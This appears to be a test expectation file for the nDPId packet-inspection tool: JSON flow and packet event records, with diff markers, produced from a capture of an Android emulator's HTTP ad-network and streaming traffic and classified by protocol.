{"hostname":"play.google.com","url":"play.google.com\/store\/apps\/details?id=com.azarlive.android&referrer=adjust_external_click_id%3Dv.2_g.143845_a.f84f54bf-31cd-43ff-bd27-526ccc6457da_c.117_t.ua_u.e7df87247cbcea13%26utm_campaign%3DTest%2BCampaign%26utm_content%3DTest%2BSource%2BApp_123456789%26utm_source%3DLiftoff%26utm_term%3DTest%2BCreative","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 
+01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2529,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385232006,"flow_last_seen":1654385232006,"flow_idle_time":7580000,"flow_min_l4_payload_len":559,"flow_max_l4_payload_len":559,"flow_tot_l4_payload_len":559,"flow_avg_l4_payload_len":559,"midstream":1,"thread_ts_msec":1654385232006,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.217.16.142","src_port":53416,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"play.google.com","url":"play.google.com\/store\/apps\/details?id=com.azarlive.android&referrer=adjust_external_click_id%3Dv.2_g.143845_a.f84f54bf-31cd-43ff-bd27-526ccc6457da_c.117_t.ua_u.e7df87247cbcea13%26utm_campaign%3DTest%2BCampaign%26utm_content%3DTest%2BSource%2BApp_123456789%26utm_source%3DLiftoff%26utm_term%3DTest%2BCreative","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2530,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385232040,"flow_last_seen":1654385232040,"flow_idle_time":7580000,"flow_min_l4_payload_len":927,"flow_max_l4_payload_len":927,"flow_tot_l4_payload_len":927,"flow_avg_l4_payload_len":927,"midstream":1,"thread_ts_msec":1654385232040,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.122.190.70","src_port":33042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2530,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1654385232040,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":993,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":993,"pkt_l4_len":959,"thread_ts_msec":1654385232040,"pkt":"tKXvZygQnLbQ0+MzCABFAAPTG5ZAAEAGlqjAqAJ+A3q+RoESAFCRX\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\/dmFzdF9lbD0xIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS84My4wLjQxMDMuMTA2IE1vYmlsZSBTYWZhcmkvNTM3LjM2DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkhvc3Q6IGNsaWNrLmxpZnRvZmYuaW8NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01594{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2530,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385232040,"flow_last_seen":1654385232040,"flow_idle_time":7580000,"flow_min_l4_payload_len":927,"flow_max_l4_payload_len":927,"flow_tot_l4_payload_len":927,"flow_avg_l4_payload_len":927,"midstream":1,"thread_ts_msec":1654385232040,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.122.190.70","src_port":33042,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": 
{"hostname":"click.liftoff.io","url":"click.liftoff.io\/v1\/campaign_click\/ddfWbX-c_ZpIF_3wE-XgJSwRJPn_5OpS9IR6X4XG91XQL6ssRLV4QPLSEQgWyRbP_OAHXGp-3z8zKxdRjL-BT6h7z46z4qmAWxR5DboEhr1DytY4W5gfQLUcV6yE3POR7PrQlrVbVtH-7uW1oie-jkR4naGHTVVHKv5kFXBJ9yTIX-JngaE2MMTER1HuBx9qTlyLhiZCtWSUSv4Ze5z4QuGqjWijD0QBgAo00Wtj4VqQypzCho_p-UzOrVF8wX9LmysoZ3202xt-1RlmBNXddH_i_evO5yZGpOvG8ktdiKfhG7cddZTR6o5lyR15wY-SJTSM3ffr4dspVSFx6XdnXgfUtxY80spI9tmFMhT97KSC4cMkRv-AyNLWhDaD33WCpU7HN-VnTuM0zl4WQMna-AVBk1Ho0vhTz5ZBU32OhTf9uAkGNxuNj5w5Ifg1GnMwZxKis8J3Z6Z5mtc7gire0eQeDQ7ehtCMFLs0M1aXGE8mHhoANg_w0Ahx43Mu7zvDXSCthH8D4QhHaWoRSuGUgfBDYLzrD8LXz6qHILoQNjj8ieRBLfH22UewVLgMF7dqhXgl73VqgU1_cu-GIfsbBm90zhfd9eoo8rQfdJF2xczqvrQz6-I4FA?vast_el=1","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01594{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2530,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385232040,"flow_last_seen":1654385232040,"flow_idle_time":7580000,"flow_min_l4_payload_len":927,"flow_max_l4_payload_len":927,"flow_tot_l4_payload_len":927,"flow_avg_l4_payload_len":927,"midstream":1,"thread_ts_msec":1654385232040,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.122.190.70","src_port":33042,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": 
{"hostname":"click.liftoff.io","url":"click.liftoff.io\/v1\/campaign_click\/ddfWbX-c_ZpIF_3wE-XgJSwRJPn_5OpS9IR6X4XG91XQL6ssRLV4QPLSEQgWyRbP_OAHXGp-3z8zKxdRjL-BT6h7z46z4qmAWxR5DboEhr1DytY4W5gfQLUcV6yE3POR7PrQlrVbVtH-7uW1oie-jkR4naGHTVVHKv5kFXBJ9yTIX-JngaE2MMTER1HuBx9qTlyLhiZCtWSUSv4Ze5z4QuGqjWijD0QBgAo00Wtj4VqQypzCho_p-UzOrVF8wX9LmysoZ3202xt-1RlmBNXddH_i_evO5yZGpOvG8ktdiKfhG7cddZTR6o5lyR15wY-SJTSM3ffr4dspVSFx6XdnXgfUtxY80spI9tmFMhT97KSC4cMkRv-AyNLWhDaD33WCpU7HN-VnTuM0zl4WQMna-AVBk1Ho0vhTz5ZBU32OhTf9uAkGNxuNj5w5Ifg1GnMwZxKis8J3Z6Z5mtc7gire0eQeDQ7ehtCMFLs0M1aXGE8mHhoANg_w0Ahx43Mu7zvDXSCthH8D4QhHaWoRSuGUgfBDYLzrD8LXz6qHILoQNjj8ieRBLfH22UewVLgMF7dqhXgl73VqgU1_cu-GIfsbBm90zhfd9eoo8rQfdJF2xczqvrQz6-I4FA?vast_el=1","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 01362{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2531,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":2,"flow_last_seen":1654385232057,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":734,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":734,"pkt_l4_len":700,"thread_ts_msec":1654385232057,"pkt":"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"} 01272{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2532,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":2,"flow_last_seen":1654385232085,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":664,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":664,"pkt_l4_len":630,"thread_ts_msec":1654385232085,"pkt":"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\/HgAFhAJ\/wlseKgAAAABJRU5ErkJggg=="} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2533,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385232158,"flow_last_seen":1654385232158,"flow_idle_time":7580000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1654385232158,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"8.209.112.118","src_port":35426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00794{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2533,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1654385232158,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":307,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":307,"pkt_l4_len":273,"thread_ts_msec":1654385232158,"pkt":"tKXvZygQnLbQ0+MzCABFAAElDRhAAEAG8E3AqAJ+CNFwdopiAFAUf4ZSerS+DlAYAfY9hQAAUE9TVCAvIEhUVFAvMS4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ2hhcnNldDogVVRGLTgNClJhbmdlOiBieXRlcz0wLQ0KQ29udGVudC1MZW5ndGg6IDIxOTkNCkhvc3Q6IGFuYWx5dGljcy5yYXlqdW1wLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogQXBhY2hlLUh0dHBDbGllbnQvVU5BVkFJTEFCTEUgKGphdmEgMS40KQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="} -00802{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2533,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385232158,"flow_last_seen":1654385232158,"flow_idle_time":7580000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1654385232158,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"8.209.112.118","src_port":35426,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"analytics.rayjump.com","url":"analytics.rayjump.com\/","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} +00802{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2533,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385232158,"flow_last_seen":1654385232158,"flow_idle_time":7580000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1654385232158,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"8.209.112.118","src_port":35426,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"analytics.rayjump.com","url":"analytics.rayjump.com\/","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 
02385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2534,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":2,"flow_last_seen":1654385232158,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1498,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1498,"pkt_l4_len":1464,"thread_ts_msec":1654385232158,"pkt":"tKXvZygQnLbQ0+MzCABFAAXMDRlAAEAG66XAqAJ+CNFwdopiAFAUf4dPerS+DlAQAfZCLAAAcGxhdGZvcm09MSZvc192ZXJzaW9uPTMwJnBhY2thZ2VfbmFtZT1jb20uc2NlbmV3YXkua2Fua2FuJmFwcF92ZXJzaW9uX25hbWU9Mi44LjIuMSZvcmllbnRhdGlvbj0yJmJyYW5kPWdvb2dsZSZtb2RlbD1zZGtfZ3Bob25lX3g4NiZnYWlkPTVhYzZhMGZmLThkMTgtNDdiYy1hOTAyLTI4MTJjZjBjMjUxZSZtbmM9Jm1jYz0mbmV0d29ya190eXBlPTkmbmV0d29ya19zdHI9Jmxhbmd1YWdlPWVuJnRpbWV6b25lPUdNVCUyNTJCMDElMjUzQTAwJnVhPU1vemlsbGElMjUyRjUuMCUyQiUyNTI4TGludXglMjUzQiUyQkFuZHJvaWQlMkIxMSUyNTNCJTJCc2RrX2dwaG9uZV94ODYlMkJCdWlsZCUyNTJGUlNSMS4yMDEwMTMuMDAxJTI1M0IlMkJ3diUyNTI5JTJCQXBwbGVXZWJLaXQlMjUyRjUzNy4zNiUyQiUyNTI4S0hUTUwlMjUyQyUyQmxpa2UlMkJHZWNrbyUyNTI5JTJCVmVyc2lvbiUyNTJGNC4wJTJCQ2hyb21lJTI1MkY4My4wLjQxMDMuMTA2JTJCTW9iaWxlJTJCU2FmYXJpJTI1MkY1MzcuMzYmc2RrX3ZlcnNpb249TUFMXzguNy40JmdwX3ZlcnNpb249MjIuNC4yNS0yMSUyQiUyNTVCMCUyNTVEJTJCJTI1NUJQUiUyNTVEJTJCMzM3OTU5NDA1Jmdwc3Y9MTI0NTEwMDAmc2NyZWVuX3NpemU9MTc5NHgxMDgwJmR2aT00Qnp0WXJ4QllGUTMlMkJGUTNSVUUwRFVRUWlVbGJmQURBZm54M2lVVlBIWnpLJmFwcF9pZD0zMjQ1NiZkYXRhPXJpZCUyNTNENjI5YmVhMjBhNGU1NDEwMDAxZjAxYzd4JTI1MjZuZXR3b3JrX3R5cGUlMjUzRDklMjUyNm5ldHdvcmtfc3RyJTI1M0QlMjUyNmNpZCUyNTNEMTk5NDQzNjUyOTklMjUyNmNsaWNrX3R5cGUlMjUzRDElMjUyNnR5cGUlMjUzRDElMjUyNmNsaWNrX2R1cmF0aW9uJTI1M0QxNjUlMjUyNmtleSUyNTNEMjAwMDAxMyUyNTI2dW5pdF9pZCUyNTNEODg4MSUyNTI2bGFzdF91cmwlMjUzRGh0dHBzJTI1MjUzQSUyNTI1MkYlMjUyNTJGcGxheS5nb29nbGUuY29tJTI1MjUyRnN0b3JlJTI1MjUyRmFwcHMlMjUyNTJGZGV0YWlscyUyNTI1M0ZpZCUyNTI1M0Rjb20uYXphcmxpdmUuYW5kcm9pZCUyNTI1MjZyZWZlcnJlciUyNTI1M0RhZGp1c3RfZXh0ZXJuYWxfY2xpY2tfaWQlMjUyNTI1M0R2LjJfZy4xNDM4NDVfYS5mODRmNTRiZi0zMWNkLTQzZmYtYmQyNy01MjZjY2M2NDU3ZGFfYy4xMTdfdC51YV91LmU3ZGY4N
zI0N2NiY2VhMTMlMjUyNTI1MjZ1dG1fY2FtcGFpZ24lMjUyNTI1M0RUZXN0JTI1MjUyNTJCQ2FtcGFpZ24lMjUyNTI1MjZ1dG1fY29udGVudCUyNTI1MjUzRFRlc3QlMjUyNTI1MkJTb3VyY2UlMjUyNTI1MkJBcHBfMTIzNDU2Nzg5JTI1MjUyNTI2dXRtX3NvdXJjZSUyNTI1MjUzRExpZnRvZmYlMjUyNTI1MjZ1dG1fdGVybSUyNTI1MjUzRFRlc3QlMjUyNTI1MkJDcmVhdGl2ZSUyNTI2Y29udGVudCUyNTNEbnVsbCUyNTI2Y29kZSUyNTNEMzAxJTI1MjZleGNlcHRpb24lMjUzRG51bGwlMjUyNmhlYWRlciUyNQ=="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2535,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":3,"flow_last_seen":1654385232158,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1654385232158,"pkt":"tKXvZygQnLbQ0+MzCABFAAA4DRpAAEAG8TjAqAJ+CNFwdopiAFAUf4zzerS+DlAYAfY8mAAAM0RzdGF0dXNDb2RlJTI1Mg=="} 01707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2542,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":3,"flow_last_seen":1654385234215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":993,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":993,"pkt_l4_len":959,"thread_ts_msec":1654385234215,"pkt":"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\/dmFzdF9lbD0yIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS84My4wLjQxMDMuMTA2IE1vYmlsZSBTYWZhcmkvNTM3LjM2DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkhvc3Q6IGNsaWNrLmxpZnRvZmYuaW8NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2544,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385235892,"flow_last_seen":1654385235892,"flow_idle_time":7580000,"flow_min_l4_payload_len":1229,"flow_max_l4_payload_len":1229,"flow_tot_l4_payload_len":1229,"flow_avg_l4_payload_len":1229,"midstream":1,"thread_ts_msec":1654385235892,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.64","src_port":51686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02113{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2544,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1654385235892,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1295,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1295,"pkt_l4_len":1261,"thread_ts_msec":1654385235892,"pkt":"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"} -01877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2544,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385235892,"flow_last_seen":1654385235892,"flow_idle_time":7580000,"flow_min_l4_payload_len":1229,"flow_max_l4_payload_len":1229,"flow_tot_l4_payload_len":1229,"flow_avg_l4_payload_len":1229,"midstream":1,"thread_ts_msec":1654385235892,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.64","src_port":51686,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": 
{"hostname":"net.rayjump.com","url":"net.rayjump.com\/openapi\/ad\/v3?app_id=32456&unit_id=8881&sign=3c28ded04e0f4090229968618244b583&req_type=3&ad_num=20&tnum=1&only_impression=1&ping_mode=1&ttc_ids=%5B%5D&display_cids=%5B19944365299%5D&exclude_ids=%5B19944365299%5D&ad_source_id=1&session_id=629bea20a4e54100010f01c8&ad_type=94&offset=0&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=1&model=sdk_gphone_x86&brand=google&gaid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&mnc=&mcc=&network_type=9&network_str=&language=en&timezone=GMT%2B01%3A00&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1080x1794&is_clever=2&version_flag=1&cache1=6240&cache2=5365&power_rate=100&charging=0&sub_ip=10.0.2.16&dvi=4BztYrxBYFQ3%2BFQ3RUE0DUQQiUlbfADAfnx3iUVPHZRsRrfuHoR1RUv06N%3D%3D&api_version=1.3","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} +01877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2544,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385235892,"flow_last_seen":1654385235892,"flow_idle_time":7580000,"flow_min_l4_payload_len":1229,"flow_max_l4_payload_len":1229,"flow_tot_l4_payload_len":1229,"flow_avg_l4_payload_len":1229,"midstream":1,"thread_ts_msec":1654385235892,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.64","src_port":51686,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": 
{"hostname":"net.rayjump.com","url":"net.rayjump.com\/openapi\/ad\/v3?app_id=32456&unit_id=8881&sign=3c28ded04e0f4090229968618244b583&req_type=3&ad_num=20&tnum=1&only_impression=1&ping_mode=1&ttc_ids=%5B%5D&display_cids=%5B19944365299%5D&exclude_ids=%5B19944365299%5D&ad_source_id=1&session_id=629bea20a4e54100010f01c8&ad_type=94&offset=0&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=1&model=sdk_gphone_x86&brand=google&gaid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&mnc=&mcc=&network_type=9&network_str=&language=en&timezone=GMT%2B01%3A00&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1080x1794&is_clever=2&version_flag=1&cache1=6240&cache2=5365&power_rate=100&charging=0&sub_ip=10.0.2.16&dvi=4BztYrxBYFQ3%2BFQ3RUE0DUQQiUlbfADAfnx3iUVPHZRsRrfuHoR1RUv06N%3D%3D&api_version=1.3","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 01051{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":2,"flow_last_seen":1654385236487,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":500,"pkt_l4_len":466,"thread_ts_msec":1654385236487,"pkt":"nLbQ0+MztKXvZygQCABFAAHm3ckAAPgGvqESQE9AwKgCfgBQyeZcw8zmEVgoD4AYAIbbsgAAAQEICq7a5CW\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"} 
-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1654385140779,"flow_last_seen":1654385145113,"flow_idle_time":7580000,"flow_min_l4_payload_len":443,"flow_max_l4_payload_len":8192,"flow_tot_l4_payload_len":19639,"flow_avg_l4_payload_len":1963,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45388,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1654385140794,"flow_last_seen":1654385145146,"flow_idle_time":7580000,"flow_min_l4_payload_len":424,"flow_max_l4_payload_len":7200,"flow_tot_l4_payload_len":59466,"flow_avg_l4_payload_len":2831,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45398,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1654385156800,"flow_last_seen":1654385156865,"flow_idle_time":7580000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":2836,"flow_tot_l4_payload_len":29208,"flow_avg_l4_payload_len":1718,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.217.18.98","src_port":44368,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.GoogleServices","breed":"Acceptable","category":"Web"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1654385184117,"flow_last_seen":1654385184139,"flow_idle_time":7580000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":796,"flow_tot_l4_payload_len":1136,"flow_avg_l4_payload_len":378,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"8.209.97.107","src_port":56826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1654385140824,"flow_last_seen":1654385145140,"flow_idle_time":7580000,"flow_min_l4_payload_len":416,"flow_max_l4_payload_len":1390,"flow_tot_l4_payload_len":5240,"flow_avg_l4_payload_len":873,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1654385140835,"flow_last_seen":1654385157149,"flow_idle_time":7580000,"flow_min_l4_payload_len":434,"flow_max_l4_payload_len":14400,"flow_tot_l4_payload_len":88367,"flow_avg_l4_payload_len":2761,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 